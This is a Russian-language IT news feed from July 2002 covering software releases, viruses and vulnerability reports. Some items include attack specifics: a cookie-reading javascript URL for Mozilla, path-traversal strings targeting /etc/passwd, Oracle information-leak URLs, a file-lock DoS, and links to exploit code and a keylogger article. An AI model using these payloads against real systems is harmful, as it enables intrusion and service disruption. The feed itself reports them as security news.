Как сообщалось ранее в Интернете появился Service Pack 3 для Windows 2000, так как не было официального заявления о его релизе многие посчитали, что это была очередная версия, предназначенная для бета-тестеров, но вот сегодня появились ссылки на официальный сайт Microsoft с которого можно загрузить данный Service Pack. Пока загрузка доступна только на 2х языках: английский и немецкий. Подробнее - http://www.iexbeta.com/articles/00000240.shtml Английская версия SP3 - http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/w2ksp3.exe Немецкая версия SP3 - http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/DE/w2ksp3.exe
30/07/2002 Уязвимость в Cisco IOS v.11.1-11.3.
Обнаружена уязвимость в Cisco TFTP сервере, интегрированного в Cisco IOS v.11.1-11.3. Уязвимость заключается в том, что при посылке имени файла более 700 символов можно вызвать переполнение буфера, что может повлечь за собой сбой или перезагрузку системы. Подробнее - http://online.securityfocus.com/archive/1/284634
30/07/2002 Обнаружена уязвимость в Microsoft Internet Explorer 5.0, Mozilla и Netscape 6.2.
Подвержены оказались веб-браузеры разрешающие выполнять JavaScript, в результате использования этой уязвимости возможно получения данных с удаленного ПК (метод GET) и размещения на нем своих данных (метод POST) в обход firewall, так же возможно получить доступ к веб-сервисам firewall, используя SOAP или XML-RPC. Источник - http://www.theinquirer.net/?article=4686 Подробнее - http://www.xwt.org/sop.txt
30/07/2002 Новая система защиты CD от копирования StarForce Professional 3.0.
Новая версия системы защиты от копирования StarForce Professional включает в себя защиту файлов c данными, а также усиленные функции защиты от взлома и копирования, кроме этого система StarForce Professional обеспечивает контроль над физическими параметрами диска, что позволяет различать даже лицензионные диски, отпечатанные на различных станках. Подробнее - http://www.compulenta.ru/2002/7/29/32670/
30/07/2002 SpIDer Mail - новейшее универсальное средство защиты почты от вирусов.
Программа SpIDer Mail работает под управлением операционных систем семейства Windows 9x/Me и Windows NT/2000/XP и предназначена для антивирусной защиты любых клиентов, использующих для получения почты протокол POP3. Существует два варианта SpIDer Mail: для клиентских компьютеров ( Home Edition) и для серверов ( Server Edition). Серверный вариант программы работает как антивирусный POP3 прокси-сервер. Текущая beta-версия SpIDer Mail теперь доступна всем желающим для ознакомления и тестирования и требует для своей работы установленного Doctor Web версии 4.28. Источник - http://www.dialognauka.ru/ Скачать Home Edition - ftp://ftp.dials.ru/dsav/russian/drweb32/spdml_h.zip Скачать Server Edition - ftp://ftp.dials.ru/dsav/russian/drweb32/spdml_s.zip
30/07/2002 Статья: Установка Linux на ноутбук.
Обстоятельный выбор дистрибутива Linux для ноутбука класса Pentium 166MMX. Настройка специфичных и неспецифичных устройств. Подбор прикладного и системного ПО. Читать - http://www.softerra.ru/freeos/19163/page1.html
30/07/2002 Linux 2.4.19rc3-ac4.
Алан Кокс продолжает поддержку стабильной ветви. Сегодня вышел очередной его патч к 2.4.19-rc3. На этот раз кроме VM от Рика Ван Риля: (*) улучшена поддержка LDM (*) обновлен parport_gsc (*) решены проблемы с make xconfig и многое другое... Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-07-29-015-26-NW-KN-DV Скачать - patch-2.4.19-rc3-ac4.gz
29/07/2002 Веб-сервер Apache теперь поддерживает технологию .Net.
Компания Covalent Technologies, занимающаяся продажей дистрибутивов веб- сервера с открытыми исходниками Apache 2.0, объявила о поддержке технологии Microsoft .Net. Точнее, в новом варианте появится поддержка ASP.Net - компонента .Net, отвечающего за работу с активными серверными страницами (ASP). Такие страницы генерируются автоматически на базе предварительно созданного шаблона, который заполняется информацией, поступающей из какого-либо приложения или базы данных. Благодаря поддержке .Net в сервере Apache организации желающие использовать веб-сервисы, построенные на платформе .Net, смогут выбирать между серверной платформой с открытым исходным кодом (Apache) и системой Internet Information Server самой Microsoft. Источник - http://www.bestlinux.com.ua
29/07/2002 ФАПСИ разрешило депутатам ГосДумы смотреть порно в Интернете.
Когда 17 сентября депутаты вернутся на свои рабочие места, их будет ждать приятный сюрприз – в Госдуме завершаются работы по подключению палаты к сети интернет по оптоволоконному каналу. Пользоваться «быстрым» интернетом можно будет без каких-либо ограничений: ФАПСИ решило не устанавливать в Думе специальных фильтров, блокирующих доступ к развлекательным ресурсам сети. Источник - http://www.gazeta.ru/2002/07/26/fapsirazresi.shtml
29/07/2002 Новая версия Licq 1.2.0a.
В основном ничего нового, только исправлен ряд багов. Подробнее - http://www.licq.org/ Скачать - http://www.licq.org/download.html
29/07/2002 Обновилось ядро Linux 2.5.29.
В новой версии улучшена работа USB, ACPI, отлажена driverfs, а также ряд исправлений при работе со SCSI, улучшена поддержка звука и т.д. Подробнее - http://linuxtoday.com/news_story.php3?ltsn=2002-07-29-005-26-NW-KN-DV Скачать - http://www.kernel.org/mirrors/
29/07/2002 Статья: Восстанавливаем Linux после сбоя.
В статье приведен ряд примеров по восстановлению системы после сбоя (определение аппаратных проблем, восстановление файловой системы). Приводится обзор и сравнение "rescue" дисков, рассказывается об особенностях работы в single режиме. Читать - http://www.linuxplanet.com/linuxplanet/reports/4294/1/
28/07/2002 Windows 2000 Service Pack 3.
На сайте IeXBeta утверждается, что компания Microsoft завершила разработку третьего пакета обновлений для операционной системы Windows 2000. Как утверждают на сайте (к этой информации следует относится с известной долей скепсиса), Service Pack 3 был загружен ими с сайта Windows Update, на котором, по чьей-то ошибке, пакет обновлений появился раньше, чем ожидалось. Подробности - http://www.compulenta.ru/2002/7/26/32646/
27/07/2002 Релиз GCC v.3.1.1.
Вышла новая версия GCC, в основном ничего нового, только исправление предыдущих ошибок. Подробнее - http://gcc.gnu.org/ml/gcc/2002-07/msg01208.html Загрузить - ftp://ftp.gnu.org/gnu/gcc/gcc-3.1.1/
27/07/2002 Новая статья на linuxgazette.com.
Июльский выпуск LinuxGazette пополнился статьей Rob Tougher об основных принципах создания защищенной системы на базе ОС Линукс. Статья описывает базовые подходы к безопасной передаче данных, шифрованию, настройке iptables и т.п. Ознакомиться - http://www.linuxgazette.com/issue80/tougher.html
27/07/2002 OpenOffice теперь и для MAC.
Сегодня, на OSDCON, появилось сообщение о выходе версии OpenOffice для MAC. Сайт проекта - http://porting.openoffice.org/mac/ Источник - http://www.theregister.co.uk/
27/07/2002 Disk Investigator v.1.2.
Программа, которая позволяет искать и восстанавливать удаленные или потерянный файлы, даже если вы удалили их из корзины, за счет прямого чтения с диска в обход операционной системы. Программа абсолютно бесплатная. Работает под управлением Win9х/ME/NT/2000/XP. Подробнее - http://www.theabsolute.net/sware/dskinv.html Скачать - http://www.theabsolute.net/sware/files/dskinv.exe (534Кб)
26/07/2002 Заплатки Microsoft.
Вчера компания Microsoft выпустила рекордное количество патчей для различных программ. Были представлены заплатки для ПО Microsoft MetaDirectory Services, SQL Server, Exhcange 5.5. Кроме того, софтверный гигант повторно выпустил кумулятивный патч для Windows Media Player, заявив, что в первой версии заплатки были решены не все проблемы. Наиболее серьезными уязвимостями были признаны дыры в службе Resolution Service пакета программ SQL Server 2000, которые могут быть использованы для запуска программного кода на удаленном сервере. Кроме того, обнаруженные (и пропатченные) дыры могут использоваться для проведения DoS-атак. По информации с http://www.compulenta.ru/
26/07/2002 Немецкий суд запретил поисковые системы.
Использование поисковых систем для поиска статей на веб-сайтах печатных СМИ является нарушением законов Европейского союза. Такое решение было принято недавно судей в Высшем суде Мюнхена, в Германии. Данное судебное решение завершило двухлетнюю тяжбу между немецкой газетой Mainpost и немецкой же поисковой системой NewsClub. Продолжение http://www.compulenta.ru/2002/7/25/32582/
26/07/2002 Уязвимость в Icq 2001,2002.
В ICQ 2001, 2002 обнаружена уязвимость, при помощи которой можно повесить ICQ "жертвы". Уязвимость связана с возможностью посылки "клиенту" сообщений со вставленными графическими "смайликами" (пример - :) ). Обнаружено, что, если послать сообщение, заполненнное подобными "смайликами" (длина ICQ-сообщения 7000 байт), ICQ противоположной стороны "зависнет" на время 10-20 секунд, поребляя при этом все ресурсы процессора, либо просто "упадёт". Судя по всему, подобное сообщение сваливает ICQ с большим размером .dat-файла, в котором держится вся "история" общения через ICQ. Автор выпустил рабочий эксплоит. Эксплоит - http://www.iFud.com/dfm/DFMa.exe
26/07/2002 Возможность доступа к cookie в Mozilla.
Andreas Sandblad, известный тем, что нашёл уязвимости в броузерах IE, Opera, обнаружил уязвимость ещё в одном популярном броузере Mozilla. Как указывает сам автор, в процессе исследования возможности XSS (cross site scripting) им была обнаружена возможность чтения и подмены cookies в броузере Mozilla. Для получения этой информации и обхода безопасности броузера необходимо создать javascript URL с включённой javascript-функцией вида: javascript://[host]/[path]\n[code to read cookie]. Для примера чтения cookies для сайта www.google.com автор приводит пример следующей функции: function init(){f.location = "javascript://www.google.com/\n"+ "'<body onload=alert(document.cookie)>'"; } Важным моментом здесь является именно применение символов "//" перед именем хоста и путём и символа переводща строки "\n" перед кодом чтения cookies. Открытый при помощи приведённого автором примера frame/iframe/window javascript URL допускает возможность чтения локальных cookies и подмену их на cookies других доменов. Эта уязвимость была устранена в релизе Mozilla 1.1 Beta, выпущенном 22 июля. Временной мерой защиты предлагается использовать установку "Disable access to cookies using javascript" в Preferences->Advanced->Scripts & Plugins-> Более подробно - http://www.security.nnov.ru/search/document.asp?docid=3256
26/07/2002 DoS в роутере ZyXEL prestige 642R.
Посылка одного пакета роутеру ZyXEL prestige 642R с установленной ОС ZyNOS S/W Version: V2.50(FA.1) может привести к неработоспособности роутера на время около 30 сек. При этом он перестаёт пересылать пакеты из внутренней сети во внешнюю. Для посылки такого пакета применяется популярная в своё время программа jolt. Исходник jolt - http://packetstorm.decepticons.org/exploits/DoS/jolt.c
26/07/2002 Добавление списка непропатченных уязвимостей в Inetrnet Explorer.
Как сообщалось ранее в наших новостях, Pivx Solutions ведёт список непропатченных на настоящий момент уязвимостей в популярном броузере от Microsoft Internet Explorer - на настоящий момент их 20. Авторы сайта подчёркивают, что все перечисленные уязвимости присутствуют в крайней версии IE со всеми установленными патчами. 23 июля туда была добавлена уязвимость, связанная с возможностью доступа к локальным файлам при нажатии клавиши Ctrl. Как подчёркивает Thor Larholm, поддерживающий сайт, подобное поведение IE наблюдается и при комбинации клавиш Shift+Ins, для чего в тексте экплоита от Andreas Sandblad необходимо изменить event.ctrlKey на event.shiftKey и 86 на 45 (исправлено на самом сайте). Кроме того, на странице включены узявимости, найденные GreyMagic Software в Netscape, Galeon и Mozilla, а также уязвимости в Opera 6.01, 6.02. Протестировать уязвимости можно прямо со страницы. Список уязвимостей - http://www.pivx.com/larholm/unpatched/
25/07/2002 Новый вирус W32.Lavehn.A@mm.
Компания Symantec сообщает о появлении в сети нового вируса W32.Lavehn.A@mm, распространяющегося по электронной почте. Данный вирус распространяется в сообщении с темой "ADMISSION 2003" с приложенным файлом Unheval.exe. При запуске вложенного исполняемого файла вирус рассылает себя по всем контактам в адресной книге Microsoft Outlook и удаляет все файлы с расширениями .xls, .doc, .mdb, .mp3, .rpt, и .dwg. на жестком диске. По данным http://www.compulenta.ru
25/07/2002 Kernel 2.5.28 released.
Отказ от "pre" версий в нестабильной ветви ядра Linux стал причиной столь быстрого изменения 3-ей цифры в номере версии. Сегодняшний день не стал исключением - вышла 2.5.28 версия. На этот раз были сделаны изменения в механизме работы с IRQ, а так же внесены коррективы в архитектурно-зависимый код для PowerPC64 и m68k . ChangeLog - http://www.lwn.net/Articles/5577/ Источник - http://www.lwn.net/
25/07/2002 Пентагон согласился изменить частоты работы некоторых военных средств связи, освобождая место в радиоволнах для портативных телефонов и других гражданских беспроводных устройств.
Провайдеры сотовой связи мотивировали свой запрос на расширение диапазонов необходимостью обеспечения пользователей телефонов высокоскоростным доступом в Интернет и возможностью просмотра видео. (Большинство военных частот в США занято в системах управления спутниками, тренировок воздушных боев и точного наведения оружия).Источник - http://www.cnn.com/2002/TECH/industry/07/24/allocating.airwaves.ap/index.html
25/07/2002 Очередной сюрприз от Blender.
В связи с банкротством компании NaN, их разработка Blender переходит в разряд Free Software. С 1998-ого года более 250.000 пользователей OS Linux избрали Blender в качестве инструмента для создания "3D animation". Теперь, после 4х лет коммерческого статуса, данный продукт переходит в распоряжение Free Software Foundation. Подробности - http://newsforge.com/newsforge/02/07/23/1713210.shtml?tid=11
25/07/2002 Торвальдс включил патч Ван Риля в ядро.
Линус Торвальдс принял решение о включении патча реверсивного маппинга памяти Рика Ван Риля в ядро ОС Linux. Данный механизм займет место на самой вершине системы VM Андреа Анджели. Источник - http://www.kerneltrap.com/node.php?id=354
25/07/2002 Вышла NetBSD 1.5.3.
На днях вышла новая версия популярной ОС. Текущий релиз - подборка заплаток и набор патчей для повышения стабильности в работе. Теперь NetBSD способна работать на 20 различных архитектурах. Источник - http://www.kerneltrap.com/node.php?id=360
24/07/2002 Новая уязвимость в Internet Explorer'е.
Специальным образом сформированная страница позволяет получить любой файл c машины клиента. Для реализации уязвимости достаточно использования javascript. 1. При нажатии пользователем CTRL управление передается обработчику события нажатия клавиши. Далее в функции-обработчике эмулируется нажатие 'V' и таким образом обходятся ограничения на операцию вставки. 2. Содержимое буфера обмена может быть изменено. Фокус ввода передается на скрытую форму загрузки файла, затем выполняется операция вставки. 3. Абсолютно легальной операцией javascript подтверждаем (submit) отправку. Нет необходимости задавать полный путь к локальному файлу, достаточно использовать "..\filename". 23 июля Microsoft в ответ на сообщение обнаружившего уязвимость заявила, что данная уязвимость не является опасной, решается грамотной настройкой браузера и патча выпущено не будет. Рализация уязвимости на php - http://www.php.net/manual/en/features.file-upload.php
24/07/2002 Обнаружен вирус, заражающий телеприставки.
На этой неделе в сети был обнаружен новый вирус, заражающий телеприставки с возможностью доступа к интернету. Устройства, известные как WebTV (или MSNTV в исполнении Microsoft), подвержены заражению вируса, распространяющегося по электронной почте. Как сообщают пользователи интернет-приставок, при открытии файла, прикрепленного к зараженному письму, устройство перезагружается и набирает телефонный номер полиции. Представитель компании Microsoft подвтердил, что 18 пользователей MSNTV обращались в службу поддержки с жалобами на заражение приставки вирусом. В форумах, посвященных работе веб-приставок, владельцы устройств также сообщают о подобном поведении устройств, которое зачастую приводит к приезду полиции по ложному вызову. Компания Microsoft рекомендует удалять сообщение с вирусом без прочтения. В случае заражения телеприставки рекомендуется произвести аппаратный сброс устройства. Представитель софтверного гиганта заявил, что в настоящее время исследуются возможности создания программной защиты от вируса Источник - http://www.compulenta.ru
24/07/2002 Официальный релиз PHRACK 59.
Объявлено об официальном релизе очередного номера PHRACK. При этом авторы говорят, что ранний (предварительный релиз), выпущенный для ознакомления ограниченному кругу лиц, был выпущен без согласования с авторами и, кроме того, утилита для распаковки журнала была заражена троянцем, в связи с чем издатели напоминают, что официальным и доверенным публикатором журнала является только сайт www.phrack.org. Заархивированная версия журнала - http://www.phrack.org/gogetit/phrack59.tar.gz
24/07/2002 Cтатья "Написание кей-логгера для ядра Linux".
В 59-м номере журнала PHRACK опубликована довольно любопытная статья под названием "Writing Linux Kernel Keylogger", которая может представлять большой интерес для системных программистов, исследователей безопасности Linux. Cостоит из 2-х частей. В первой описывается работа драйвера клавиатуры в Linux и обсуждаются методы создания кейлоггера, основанного на ядре Linux. Вторая часть детально рассматривает работу программы vlogger-кейлоггера, написанного автором статьи. Статья - http://www.phrack.org/show.php?p=59&a=14
23/07/2002 Версия 0.2 инструмента injectso.
Группа SecureReality из Австралии анонсировала версию 0.2 своего пакета injectso. Назначение этого продукта - внедрение (inject) разделяемых библиотек (.so) в запущенные процессы в Linux (x86/IA32, Sparc-платформы) и Solaris (Sparc). Внедрённая таким образом библиотека может изменять поведение процесса путём перехвата вызовов библиотечных функций. Возможности программы довольно впечатляющи. Среди них: приём и передача информации через сокеты, открытые процессом, чтение и запись файлов, открытых процессом, прерывание любого ввода в процесс, фильтрация опасных данных, прослушивание взаимодействия процесса с другим процессом и т.д. Впервые продукт был представлен на конференции BlackHat вАмстердаме в 2001 г. и будет также представляться вместе с другой техникой модификации бинарных файлов на BlackHat USA 2002 1 августа.на Injectso доступен - http://www.securereality.com.au/archives/injectso-0.2.tar.gz Слайды презентации injectso - http://www.blackhat.com/presentations/bh-europe-01/shaun-clowes/injectso3.ppt
23/07/2002 Эксплоит для DoS PHP.
Мээтью Мэрфи выпустил экплоит для получения DoS PHP. Уязвимость связана с опцией cgi.force_redirect в файле конфигурации Апача, предназначенной для преобразования реального пути CGI в виртуальный. Однако при формировании запроса с отсутствующими аргументами командной строки, интерепретатор PHP не освобождает ресурсы. Таким образом, сформировав много пустых запросов (вида http://localhost/php/php), можно исчерпать все ресурсы CGI/ASAPI на сервере. Как говорит сам автор, он компилировал исходник на WinMe с MSVC 6.0. Будет ли он работать на Linux/BSD он не уверен. Эксплоит - http://www.murphy.101main.net/php-apache.c Эксплоит для x86/linux mod_php v4.0.2rc1-v4.0.5 - http://www.security.nnov.ru/files/73501867.c
23/07/2002 Уязвимость в PHP версий 4.2.0, 4.2.1.
PHP Group сообщает о найденной Стефаном Эссером из e-matters GmbH серьёзной уязвимости в текущих версиях PHP (4.2.0, 4.2.1). PHP содержит код для разбора заголовков запросов вида HTTP POST. При этом в запросах клиента "multipart/form-data" по-разному разбираются переменные и файлы. Из-за неверного разбора и проверки входных данных возможно послать специально сформированный запрос HTTP POST (как локально, так и удалённо), при этом либо получить права привилегированного пользователя, либо "свалить" сервер. Необходимо отметить, что подобная уязвимость присутствует также на Вэб-серверах за файрволлами. Поведение сервера зависит от архитектуры. На IA32 (он же x86)-сервер слетает и необходимо перезагружать систему (DoS). На не Интел-платформе возникает возможность получения доступа к системе. Выпущена новая версия PHP 4.2.2, в которой эта уязвимость отсутствует. При невозможности апгрейда PHP Group рекомендует запретить все виды POST-запросов к серверу, для чего в основном конфигурационном файле Апача прописать секцию: <Limit POST> Order deny,allow Deny from all </Limit>CERT также выпустил чуть позднее информационный бюллетень по этой уязвимости, где также приводятся рекомендации проапгрейдить PHP, либо запретить обработку POST-запросов. Более подробно - http://security.e-matters.de/advisories/022002.html Новая версия PHP - http://www.php.net/release_4_2_2.phpИнформационный бюллетень CERT - http://www.cert.org/advisories/CA-2002-21.html
23/07/2002 Бета-релиз Mozilla 1.1.
Вышел бета-релиз версии 1.1 популярного броузера Mozilla. Отличия от "альфа"-версии: лучшая поддержка арабского языка, пофиксен баг при просмотре английского языка в text boxes, улучшена работа JavaScript Debugger, улучшено появление иконок в MS Win для различных Mozilla-приложений, Mozilla в Linux сейчас имеет возможность работы в полноэкранном режиме (клавиша F11), улучшена совместимость сайтов и рендеринг и т.д. Полное описание - http://www.mozilla.org/releases/mozilla1.1b/
22/07/2002 KernelTrap: "ядро будет выдавать код ошибки азбукой Морзе".
Просматривая исходный код последней версии ядра Linux (2.4.19-rc1-ac1) , Вы можете натолкнуться в файле 'linux/drivers/char/pc_keyb.c' на следующее определение функции 'panic_blink': "/* Tell the user who may be running in X and not see the console that we have panic'ed. This is to distingush panics from "real" lockups. Could in theory send the panic message as morse, but that is left as an exercise for the reader. */" Как утверждает разработчик патча ядра Andrew Rodland, он действительно разработал патч, для сообщения о причине ошибки в форме азбуки Морзе. Более подробно - http://kerneltrap.org/node.php?id=355
22/07/2002 Красноярский хакер может получить семь лет за любовь к бесплатному Интернету.
В Красноярском крае возбуждено уголовное дело против инженера Александра Хохлова, который, как считает следствие, при помощи специальной программы узнавал чужие пароли для доступа в Интернет, сообщает "Коммерсант". При помощи паролей он пользовался услугами сети за чужой счет. В деле фигурирует около 30 подобных случаев. Его обвиняют по двум статьям УК РФ - 272 (Неправомерный доступ к компьютерной информации) и 273 (Создание, использование и распространение вредоносных программ для ЭВМ). Эти статьи предусматривают наказание в виде лишения свободы сроком до семи лет. Как отмечает NTVRU.com, это уже 18-е уголовное дело по 272 статье, которое возбудили в Красноярском крае в этом году. Подробности - http://www.kommersant.ru/lenta-small.html?id=48455
22/07/2002 Уязвимости в Aquonics File Manager.
Aquonics File Manager 1.5 - расширенный файл мэнеджер. ERASER обнаружил 2 удалённых уязвимости в этом программном продукте. Через первую уязвимость, 'Обратный путь в директориях', возникает возможность просматривать все файлы, добавляя код обратного пути, в таком виде, как ../../../ .Пример - просмотр файла etc/passwd: www.vulnerable.url/filemanager/source.php?../../../../etc/passwd Через вторую уязвимость, 'Повышение прав доступа', появляется возможность просмотра файла userlist.cgi, в котором хранятся логины, и зашифрованные MD5 пароли. Пример использования уязвимости: www.vulnerable.url/filemanager/source.php?filemanager/userlist.cgi Для данных операций необходим статус не меньше Super Admin(статус меньше чем Admin). Источник - http://www.security.nnov.ru/search/document.asp?docid=3244
22/07/2002 Cтатья "Двадцать предупреждений для ASP-разработчиков".
Сайт securitylab.ru выложил довольно полезную и интересную статью, предназначенную для разработчиков Web-приложений. Задача статьи - рассказать программистам о наиболее типичных ошибках, допускаемых разработчиками при ASP-программировании. Недостаточная защищённость Web-приложений на www-сервере компании может привести (при хорошей сетевой защищённости) к полной компрометации системы. Статья доступна - http://SecurityLab.ru/?ID=32076
22/07/2002 Выход Perl 5.8.0.
Улучшены поддержка Unicode, легковесных процессов, существенно переделана система ввода/вывода. ChangeLog - http://dev.perl.org/perl5/news/2002/07/18/580ann/perldelta.pod Сайт проекта - http://www.perl.org/ Источник - http://www.linux.kiev.ua
21/07/2002 Возможность обхода огрничений в Adobe Acrobat eBook Reader и Content Server.
Владимир Каталов из печально известной фирмы ELCOMSOFT (вспомните историю с Дмитрием Скляровым) обнаружил уязвимость в защите eBook Reader от Acrobat и Content Server той же фирмы, который собственно и занимается распространением электронных книг через Web после проведения онлайновой покупки. Суть уязвимости заключается в том, что если обладатель прав на книгу дал вам разрешение на ограниченный просмотр книги (например 10 страниц)-это ограничение можно обойти, если последовательно делать бэкап скачанных в буфер страниц в соответствующие директории (см. оригинал) и, таким образом, последовательно получить всю книгу не платя за это дополнительных денег. Вторая уязвимость связана с тем, что собственник книги (вне зависимости от ограничений, наложенных издателем) может создать неограниченное количество копий книги, а также передавать её (Lend в оригинале) совершенно построннему человеку. Как пишет сам автор, этой уязвимости невозможно избежать не изменив кардинально оба уязвимых приложения. Таким образом, вот таким вот небольшим сообщением об уязвимости в продуктах Adobe фирма Elcomsoft как бы отвечает Adobe. Примечательно, что это сообщение не было (пока) опубликовано в BUGTRAQ, но появилось на сайте небезызвестного 3APA3A из Нижнего Новгорода. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3242
21/07/2002 Выход Linux 2.5.27.
Вчера вечером Линус Торвальдс сообщил о выходе очередной версии девелоперской серии ядра Linux 2.5.27. Основные изменения касаются улучшения работы AGP, патчи IDE, поддержка 4GB FAT32, улучшение работы USB-устройств, а также работы LSM (Linux Security Modules). Полный CHANGELOG - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.27
21/07/2002 Настройка аутентификации пользователей посредством LDAP.
Руководство на русском языке по настройке единой системы аутентификации с использованием LDAP. Документ описывает процесс установки OpenLDAP и конфигурирования внешних программ для авторизации через LDAP. Рассматривается включение авторизации через LDAP в таких программах, как ftpd, sshd, login, Samba , pop3d и squid. Читаем - http://www.opennet.ru/docs/RUS/ldap/index.html
20/07/2002 В меру опасные виртуальные открытки.
Взято с сайта www.bugtraq.ru. @Card - система/скрипт посылки виртуальных открыток. Присутствует уязвимость использования XSS. Из-за отсутствия проверки переменной 'pic' атакующий имеет возможность удалённо исполнить любой код в браузере из уязвимого сервера заменив или добавив к используемой открытке, код с закрытием кавычки в начале. Источник с примером - http://www.bugtraq.ru/rsn/archive/2002/07/.keep/.advisory.acard.rus.txt
20/07/2002 Выпущен Debian GNU/Linux 3.0.
Группа разработчиков дистрибутива Debian GNU/Linux анонсировала 19 июля выпуск 3-го релиза. Как указывается в анонсе сейчас Debian GNU/Linux поддерживает 11 аппартаных платформ (включена поддержка IA-64, HP PA-RISC, MIPS и S/39. Таким образом этот дистрибутив запускается на широком спектре вычислительных машин-от палмтопов до суперкомпьюеров. Это первый релиз Debian, в который интегрировано криптографическое ПО. OpenSSH и GNU Privacy Guard также включены в установку по умолчанию, сильные криптоалгоритмы включены в Вэб-броузеры (представлены Mozilla, Galeon, Konqueror) и вэб-серверы, а также в СУБД. В дистрибуцию включены: KDE 2.2, GNOME 1.4, XFree86 4.1. Этот релиз поддкрживает ядра 2.2 и 2.4-в версии 2.4 включена поддержка журналируемых файловых систем ext3 и reiserfs. Также это первый релиз Debian, поддерживающий FHS 2.2 (Filesystem Hierarchy Standard) и ПО, разработанное для LSB (Linux Standard Base). Добавлена поддержка многих национальных языков. debconf поможет быстро и легко конфигурировать систему. Подробности - http://www.debian.org/News/2002/20020719
20/07/2002 Новый патч от LSM.
Нашумевший несколько месяцев назад проект LSM (Linux Security Modules), сопровождавшийся выходом SELinux, продолжает свое развитие - сразу после появления 3-его релиз-кандидата ядра стабильной ветви 2.4.19 разработчики LSM выпустили к нему lsm-patch. Как и прежде, девелоперы получают возможность путем использования LSM повысить безопасность системы и уберечь ее от множества различных типов атак. Источник - http://lsm.immunix.org/
20/07/2002 Баг в OpenBSD, FreeBSD, NetBSD, SUSE Linux.
Найденный баг заключается в том, что любой пользователь может прекратить создание администраторского бэкапа системных файлов, а также использование модемных программ, использующих `tip` для связи с последовательным портом. Сделать это можно посредством системного вызова flock(), блокировав при этом файл /etc/dumpdates (в случае бэкапа), либо файл /var/log/acculog (в случае коммуникационных программ). Сделать это можно либо посредством выполнения команды /usr/bin/lockf, либо скачать исходники этой программы и откомпилировать на своей системе. Подробнее - http://online.securityfocus.com/archive/1/283033
20/07/2002 Xbox - больше не игрушка.
Microsoft с помощью своей разработки Xbox(игровая консоль) собирается создать некую игровую сеть, но нашлись умельцы - Xbox Linux Project, которые настраивают ее не для работы с игровым ПО от Microsoft, а для работы под Linux, такие консоли смогут организовать собственную не контролируемую сеть. Подробнее - http://www.wired.com/news/games/0,2101,53895,00.html Xbox Linux Project - http://xbox-linux.sourceforge.net/
19/07/2002 Децентрализованная система аутентификации Liberty Alliance.
Консорциум американских компаний Liberty Alliance объявил о запуске новой cистемы аутентификации пользователей интернета. Инициатива создания Liberty Alliance была выдвинута компанией Sun Microsystems в сентябре прошлого года. При этом новый стандарт призван был стать альтернативой системе Microsoft Passport. Необходимо заметить, что, несмотря на то, что Liberty Alliance и Passport выполняют одни и те же функции, принципы их действия значительно различаются. Passport является централизованной системой, и функции хранения пользовательских данных и аутентификации выполняет сама Microsoft. В случае Liberty Alliance аутентификацию пользователя может производить любой из участников консорциума. При этом пользователь сможет выбирать, использовать ли ему одни и те же данные для регистрации на различных сайтах или каждый раз вводить персональные данные заново. Идентификация пользователей будет производиться с использованием, так называемых, "цифровых жетонов" (digital token). Важно отметить, что согласно заявлениям разработчиков Liberty Alliance, перехват такого жетона не приведет к нарушению конфиденциальности пользователя. Впрочем, спецификации протоколов для передачи номеров кредитных карт и другой важной информации находятся в стадии разработки. Источник - http://www.compulenta.ru/2002/7/19/32307/
19/07/2002 NetLoony-полнофункциональный GUI для управления Apache.
Lawrie представил широкой публике 18 июля NetLoony-полнофункциональный GUI (Graphic User Interface) для управления функционированием Вэб-сервером Apache, написанный на Java. Необходимо отметить, что раньше это был коммерческий продукт, который сейчас автор выпустил под лицензией GPL. Позволяет оценивать (через монитор) эффективность и скорость доступа к серверу, контролировать и управлять конфигурацией, удалённо настраивать и управлять сервером, включает инструменты для загрузки и управления модулями, поддерживает SSL, cодержит встроенный сканер и текстовый редактор а также много других полезных инструментов. В дальнейшем автор планирует включить другие полезные функции. Страница проекта - http://netloony.sourceforge.net/
19/07/2002 Возможность получения критической информации в Oracle Reports Server.
Oracle Reports Server - это коммерческий сервер отчётов, выпускаемый фирмой Oracle. Как указывается в отчёте группы AngryPacket Security обнаружена возможность выдачи удалённому неавторизованному пользователю важной системной информации, которая может быть использована для дальнейшей организации атак на сервер. При этом информация, выдаваемая сервером, включает: системные переменные PATH, ORACLE_HOME, REPORTS60_PATH, REPORTS60_TMP, версию сервера и другю критичную информацию. Всё это можно получить, сформировав запросы вида: http://some.site.com/cgi-bin/rwcgi60, http://some.site.com/cgi-bin/rwcgi60/showenv. Фирма Oracle выпустила замечание 133957.1 - "Restricting Access to the Reports Server Environment and Output". Источник - http://sec.angrypacket.com/advisories/0004_AP.oracle.txt
19/07/2002 Cтатья "Инсталляция Sybase на Linux-сервер".
Ужесточение лицензионной политики ведущих разработчиков программного обеспечения, а также стоимости ПО, заставляет много IT-специалистов рассматривать вопрос о ПО с открытым исходным кодом. Зачастую это приводит к миграции на ОС Linux и свободно-распространяемого ПО для Linux-платформы. Зачастую при построении инфраструктуры предприятий малого и среднего бизнеса встаёт задача построения внутреннего сервера управления базами данных. Александр Прокопенко советует остановить свой выбор на Sybase-коммерческом (однако бесплатном для Linux) SQL-сервере, обладающем большой гибкостью, большой скоростью и поддерживающим многие национальные кодировки, а также совместимым с MS SQL. В статье автор рассматривает вопросы инсталляции Sybase на Linux-сервер, а также вопросы локализации Sybase. Рекомендуется к прочтению администраторам серверов баз данных, построенных на платформе Linux. Статья - http://www.linuxplanet.com/linuxplanet/tutorials/4323/1/
19/07/2002 Кампания по повышению безопасности ПО дорого обошлась Microsoft.
Билл Гейтс признался, что объявленный в начале этого года "месячник безопасности" отнял у Microsoft значительно больше времени и денег, чем планировалось. В начале февраля более 8500 специалистов компании были переброшены с разработки новых продуктов на латание дыр в старых. А еще раньше в прессу просочилось письмо Гейтса к сотрудникам Microsoft, в котором говорилось о необходимости повышения надежности выпускаемых компанией продуктов. Первоначально планировалось, что "месячник безопасности" займет ровно 30 дней, но на самом деле, на это потребовался вдвое больший срок. Затраты же на латание дыр, по собственному признанию Гейтса, превысили 100 млн. долл. Однако основатель Microsoft считает, что расходы полностью оправданы: безопасность продуктов компании значительно повысилась. Доказательством этого может служить то, что за первую половину текущего года компанией было выпущено вдвое меньше предупреждений о дырах, чем за аналогичный период 2001 г. Источник - http://www.compulenta.ru
19/07/2002 Перевод на русский язык статьи автора первого вируса, ориентированного на среду исполнения .NET (Win32.Donut).
